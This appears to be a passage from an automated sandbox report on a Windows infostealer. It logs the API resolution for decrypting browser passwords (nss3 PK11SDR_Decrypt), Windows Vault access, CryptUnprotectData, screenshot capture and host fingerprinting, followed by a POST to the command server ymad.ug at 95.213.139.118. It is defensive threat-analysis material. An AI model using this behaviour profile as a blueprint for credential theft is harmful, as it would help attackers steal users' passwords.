Fn
Get Address c:\windows\syswow64\gdi32.dll function = StretchDIBits, address_out = 0x75ae7435 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SwapBuffers, address_out = 0x75b159fb True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetGraphicsMode, address_out = 0x75aec182 True 1
Fn
Get Address c:\windows\syswow64\msimg32.dll function = TransparentBlt, address_out = 0x74061320 True 1
Fn
Get Address c:\windows\syswow64\msimg32.dll function = AlphaBlend, address_out = 0x74061210 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMenuInfo, address_out = 0x74f7c151 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadImageA, address_out = 0x74f68455 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyIcon, address_out = 0x74f649b2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x74f61341 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetPropA, address_out = 0x74f67b5a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CopyImage, address_out = 0x74f64a09 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = FindWindowW, address_out = 0x74f598fd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DrawTextExW, address_out = 0x74f6149e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x74f61361 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetScrollRange, address_out = 0x74f7d50b True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetDC, address_out = 0x74f572c4 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = SetPropA, address_out = 0x74f6822c True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PeekMessageA, address_out = 0x74f65f74 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowScrollBar, address_out = 0x74f64162 True 1
Fn
Get Address c:\windows\syswow64\winhttp.dll function = WinHttpQueryHeaders, address_out = 0x7400ba51 True 1
Fn
Get Address c:\windows\syswow64\winhttp.dll function = WinHttpQueryAuthSchemes, address_out = 0x74034101 True 1
Fn
Get Address c:\windows\syswow64\winhttp.dll function = WinHttpCloseHandle, address_out = 0x74002c01 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryA, address_out = 0x76c349d7 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSection, address_out = 0x77162c42 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalFree, address_out = 0x76c32d3c True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LocalAlloc, address_out = 0x76c3168c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersion, address_out = 0x76c34467 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetThreadLocale, address_out = 0x76c335cf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoA, address_out = 0x76c30e00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoA, address_out = 0x76c4d5e5 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 2
Fn
Get Address c:\windows\syswow64\user32.dll function = GetKeyboardType, address_out = 0x74f99ac4 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MessageBoxA, address_out = 0x74fafd1e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharNextA, address_out = 0x74f57a1b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExA, address_out = 0x74d548ef True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExA, address_out = 0x74d54907 True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 2
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SysFreeString, address_out = 0x75223e59 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SysReAllocStringLen, address_out = 0x75227810 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SysAllocStringLen, address_out = 0x752245d2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x76c31245 True 2
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegEnumKeyA, address_out = 0x74d6a299 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = FreeSid, address_out = 0x74d5412e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalUnlock, address_out = 0x76c4cfdf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalLock, address_out = 0x76c4d0a7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemInfo, address_out = 0x76c349ca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileAttributesW, address_out = 0x76c31b18 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileW, address_out = 0x76c34435 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x76c389b3 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateDirectoryW, address_out = 0x76c34259 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x76c5830d True 2
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SelectObject, address_out = 0x75ae4f70 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = DeleteObject, address_out = 0x75ae5689 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = DeleteDC, address_out = 0x75ae58b3 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateCompatibleDC, address_out = 0x75ae54f4 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateCompatibleBitmap, address_out = 0x75ae5f49 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = BitBlt, address_out = 0x75ae5ea6 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ReleaseDC, address_out = 0x74f57446 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetSystemMetrics, address_out = 0x74f57d2f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CharToOemBuffA, address_out = 0x74f6b1b0 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = OleInitialize, address_out = 0x755fefd7 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x75629d0b True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\crypt32.dll function = CryptUnprotectData, address_out = 0x759e5a7f True 1
Fn
Get Address c:\windows\syswow64\crtdll.dll function = wcscmp, address_out = 0x6c25032a True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdiplusStartup, address_out = 0x73e45600 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdiplusShutdown, address_out = 0x73e456be True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipCreateBitmapFromHBITMAP, address_out = 0x73e56671 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipGetImageEncodersSize, address_out = 0x73e62203 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipGetImageEncoders, address_out = 0x73e6228c True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipDisposeImage, address_out = 0x73e54cc8 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll function = GdipSaveImageToStream, address_out = 0x73e54153 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CreateStreamOnHGlobal, address_out = 0x7560363b True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = GetHGlobalFromStream, address_out = 0x756041d5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsW, address_out = 0x76c34173 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetComputerNameW, address_out = 0x76c3dd0e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalMemoryStatus, address_out = 0x76c38b6d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSize, address_out = 0x76c3196e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateMutexA, address_out = 0x76c34c6b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReleaseMutex, address_out = 0x76c3111e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentDirectoryW, address_out = 0x76c35611 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetEnvironmentVariableW, address_out = 0x76c389f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableW, address_out = 0x76c31b48 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetCurrentDirectoryW, address_out = 0x76c41260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GlobalMemoryStatusEx, address_out = 0x76c5d4c4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32FirstW, address_out = 0x76c58baf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Process32NextW, address_out = 0x76c5896c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetDllDirectoryW, address_out = 0x76cb004f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTimeZoneInformation, address_out = 0x76c3465a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RemoveDirectoryW, address_out = 0x76cb44cf True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLogicalDriveStringsA, address_out = 0x76c3e4dc True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = GetUserNameW, address_out = 0x74d5157a True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegQueryValueExW, address_out = 0x74d546ad True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = AllocateAndInitializeSid, address_out = 0x74d540e6 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = LookupAccountSidA, address_out = 0x74d81daa True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CreateProcessAsUserW, address_out = 0x74d4c592 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CheckTokenMembership, address_out = 0x74d4df04 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyW, address_out = 0x74d52459 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegEnumKeyW, address_out = 0x74d5445b True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegEnumValueW, address_out = 0x74d548cc True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptAcquireContextA, address_out = 0x74d491dd True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptCreateHash, address_out = 0x74d4df4e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptHashData, address_out = 0x74d4df36 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptGetHashParam, address_out = 0x74d4df7e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptDestroyHash, address_out = 0x74d4df66 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = CryptReleaseContext, address_out = 0x74d4e124 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EnumDisplayDevicesW, address_out = 0x74f7e567 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wvsprintfA, address_out = 0x74f6aad3 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetKeyboardLayoutList, address_out = 0x74f62e69 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = RtlComputeCrc32, address_out = 0x771effc1 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetOpenA, address_out = 0x753ff18e True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetConnectA, address_out = 0x753f49e9 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpOpenRequestA, address_out = 0x753f4c7d True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpAddRequestHeadersA, address_out = 0x753edcd2 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = HttpSendRequestA, address_out = 0x754618f8 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetReadFile, address_out = 0x753eb406 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCloseHandle, address_out = 0x753eab49 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetCrackUrlA, address_out = 0x753dd075 True 1
Fn
Get Address c:\windows\syswow64\wininet.dll function = InternetSetOptionA, address_out = 0x753e75e8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitOnceExecuteOnce, address_out = 0x76c4d627 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateEventExW, address_out = 0x76cb410b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreW, address_out = 0x76c4ca5a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSemaphoreExW, address_out = 0x76cb4195 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolTimer, address_out = 0x76c4ee7e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolTimer, address_out = 0x7717441c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForThreadpoolTimerCallbacks, address_out = 0x7719c50e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolTimer, address_out = 0x7719c381 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWait, address_out = 0x76c4f088 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadpoolWait, address_out = 0x771805d7 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWait, address_out = 0x7719ca24 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushProcessWriteBuffers, address_out = 0x77150b8c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibraryWhenCallbackReturns, address_out = 0x7720fde8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessorNumber, address_out = 0x771a1e1d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateSymbolicLinkW, address_out = 0x76cacd11 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentPackageId, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount64, address_out = 0x76c4eee0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileInformationByHandleEx, address_out = 0x76c4c78f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFileInformationByHandle, address_out = 0x76c5cbfc True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimePreciseAsFileTime, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeConditionVariable, address_out = 0x77168456 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WakeConditionVariable, address_out = 0x771d7de4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WakeAllConditionVariable, address_out = 0x7719409d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SleepConditionVariableCS, address_out = 0x76cb4b32 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSRWLock, address_out = 0x77168456 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = AcquireSRWLockExclusive, address_out = 0x771629f1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TryAcquireSRWLockExclusive, address_out = 0x77174892 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ReleaseSRWLockExclusive, address_out = 0x771629ab True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SleepConditionVariableSRW, address_out = 0x76cb4b74 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateThreadpoolWork, address_out = 0x76c4ee45 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SubmitThreadpoolWork, address_out = 0x771a8491 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseThreadpoolWork, address_out = 0x7719d8e2 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CompareStringEx, address_out = 0x76cb46b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLocaleInfoEx, address_out = 0x76cb4751 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Get Address c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll function = InitializeConditionVariable, address_out = 0x77168456 True 1
Fn
Get Address c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll function = SleepConditionVariableCS, address_out = 0x76cb4b32 True 1
Fn
Get Address c:\windows\syswow64\api-ms-win-core-synch-l1-2-0.dll function = WakeAllConditionVariable, address_out = 0x7719409d True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = sqlite3_open, address_out = 0x73ae49c9 True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = sqlite3_close, address_out = 0x73ae3341 True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = sqlite3_prepare_v2, address_out = 0x73acd529 True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = sqlite3_step, address_out = 0x73aacfda True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = sqlite3_column_text, address_out = 0x73aad453 True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = sqlite3_column_bytes, address_out = 0x73aad37e True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = sqlite3_finalize, address_out = 0x73aac7d3 True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = NSS_Init, address_out = 0x73b20391 True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = PK11_GetInternalKeySlot, address_out = 0x73b448fe True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = PK11_Authenticate, address_out = 0x73b2d0d8 True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = PK11SDR_Decrypt, address_out = 0x73b4089d True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = NSS_Shutdown, address_out = 0x73b2061c True 1
Fn
Get Address c:\users\5p5nrg~1\appdata\local\temp\ff335045\nss3.dll function = PK11_FreeSlot, address_out = 0x73b44370 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetThreadDescription, address_out = 0x0 False 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromString, address_out = 0x755fe599 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultOpenVault, address_out = 0x735026a9 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultEnumerateItems, address_out = 0x73503099 True 1
Fn
Get Address c:\windows\syswow64\vaultcli.dll function = VaultGetItem, address_out = 0x73503242 True 1
Fn
User (3)
Operation Additional Information Success Count Logfile
Get Username user_name_out = 5p5NrGJn0jS HALPmcxz True 3
Fn
Keyboard (1)
Operation Additional Information Success Count Logfile
Get Info type = 0, result_out = 4 True 1
Fn
System (170)
Operation Additional Information Success Count Logfile
Get Computer Name result_out = XDUWTFONO True 3
Fn
Get Time type = System Time, time = 2019-03-24 16:36:38 (UTC) True 1
Fn
Get Time type = Ticks, time = 121462 True 1
Fn
Get Time type = Performance Ctr, time = 18375974385 True 1
Fn
Get Time type = Local Time, time = 2019-03-25 03:36:38 (Local Time) True 135
Fn
Get Time type = Performance Ctr, time = 19042016873 True 1
Fn
Get Time type = Performance Ctr, time = 19042027985 True 1
Fn
Get Time type = Performance Ctr, time = 19042039154 True 1
Fn
Get Time type = Performance Ctr, time = 19042050141 True 1
Fn
Get Time type = Performance Ctr, time = 19042060963 True 1
Fn
Get Time type = Performance Ctr, time = 19042071525 True 1
Fn
Get Time type = Performance Ctr, time = 19042082397 True 1
Fn
Get Time type = Performance Ctr, time = 19042093322 True 1
Fn
Get Time type = Performance Ctr, time = 19042104141 True 1
Fn
Get Time type = Performance Ctr, time = 19042114720 True 1
Fn
Get Time type = Performance Ctr, time = 19042125440 True 1
Fn
Get Time type = Performance Ctr, time = 19042135778 True 1
Fn
Get Time type = Performance Ctr, time = 19042146153 True 1
Fn
Get Time type = Performance Ctr, time = 19042156717 True 1
Fn
Get Time type = Performance Ctr, time = 19042167498 True 1
Fn
Get Time type = Performance Ctr, time = 19042178398 True 1
Fn
Get Time type = Performance Ctr, time = 19042189328 True 1
Fn
Get Time type = Performance Ctr, time = 19042199927 True 1
Fn
Get Time type = Performance Ctr, time = 19042210637 True 1
Fn
Get Time type = Performance Ctr, time = 19042221395 True 1
Fn
Get Time type = Performance Ctr, time = 19042232255 True 1
Fn
Get Time type = Ticks, time = 126610 True 1
Fn
Get Info type = Operating System True 2
Fn
Get Info type = Operating System True 2
Fn
Get Info type = Hardware Information True 3
Fn
Mutex (1)
Operation Additional Information Success Count Logfile
Create mutex_name = A6CF1546B-343A2EC6-63D8DC88-FF4A8C5D-82A11F69 True 1
Fn
Environment (5)
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Get Environment String name = PATH True 1
Fn
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Get Environment String name = MALLOC_OPTIONS False 1
Fn
Set Environment String name = PATH, value = C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Network Behavior
HTTP Sessions (1)
Information Value
Total Data Sent 259 bytes
Total Data Received 4.27 MB
Contacted Host Count 1
Contacted Hosts 95.213.139.118
HTTP Session #1
Information Value
User Agent Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Server Name ymad.ug
Server Port 80
Username -
Password -
Data Sent 259 bytes
Data Received 4.27 MB
Operation Additional Information Success Count Logfile
Open Session user_agent = Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), access_type = INTERNET_OPEN_TYPE_PRECONFIG True 1
Fn
Open Connection protocol = HTTP, server_name = ymad.ug, server_port = 80 True 1
Fn
Open HTTP Request http_verb = POST, http_version = HTTP 1.1, target_resource = /1/index.php, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD True 1
Fn
Send HTTP Request url = ymad.ug/1/index.php True 1
Fn
Data
Read Response size = 65636, size_out = 9393 True 1
Fn
Data
Read Response size = 65636, size_out = 3464 True 1
Fn
Data
Read Response size = 65636, size_out = 908 True 1
Fn
Data
Read Response size = 65636, size_out = 65566 True 1
Fn
Data
Read Response size = 65636, size_out = 5896 True 1
Fn
Data
Read Response size = 65636, size_out = 16044 True 1
Fn
Data
Read Response size = 65636, size_out = 5537 True 1
Fn
Data
Read Response size = 65636, size_out = 32120 True 1
Fn
Data
Read Response size = 65636, size_out = 8760 True 1
Fn
Data
Read Response size = 65636, size_out = 3472 True 1
Fn
Data
Read Response size = 65636, size_out = 12588 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 2
Fn
Data
Read Response size = 65636, size_out = 36628 True 1
Fn
Data
Read Response size = 65636, size_out = 32120 True 1
Fn
Data
Read Response size = 65636, size_out = 65636 True 1
Fn
Data
Read Response size = 65636, size_out = 65589 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Read Response size = 65636, size_out = 27900 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65596 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 16300 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65557 True 1
Fn
Data
Read Response size = 65636, size_out = 65573 True 1
Fn
Data
Read Response size = 65636, size_out = 42484 True 1
Fn
Data
Read Response size = 65636, size_out = 14592 True 1
Fn
Data
Read Response size = 65636, size_out = 65557 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Read Response size = 65636, size_out = 64353 True 1
Fn
Data
Read Response size = 65636, size_out = 65573 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 2
Fn
Data
Read Response size = 65636, size_out = 57068 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 17561 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Read Response size = 65636, size_out = 65557 True 1
Fn
Data
Read Response size = 65636, size_out = 46801 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 46729 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Read Response size = 65636, size_out = 17632 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 55488 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Read Response size = 65636, size_out = 8872 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 3
Fn
Data
Read Response size = 65636, size_out = 61448 True 1
Fn
Data
Read Response size = 65636, size_out = 3464 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 2
Fn
Data
Read Response size = 65636, size_out = 65557 True 1
Fn
Data
Read Response size = 65636, size_out = 65565 True 1
Fn
Data
Read Response size = 65636, size_out = 65558 True 1
Fn
Data
Read Response size = 65636, size_out = 65572 True 2
Fn
Data
Read Response size = 65636, size_out = 65557 True 1
Fn
Data
Read Response size = 65636, size_out = 65573 True 1
Fn
Data
Read Response size = 65636, size_out = 39532 True 1
Fn
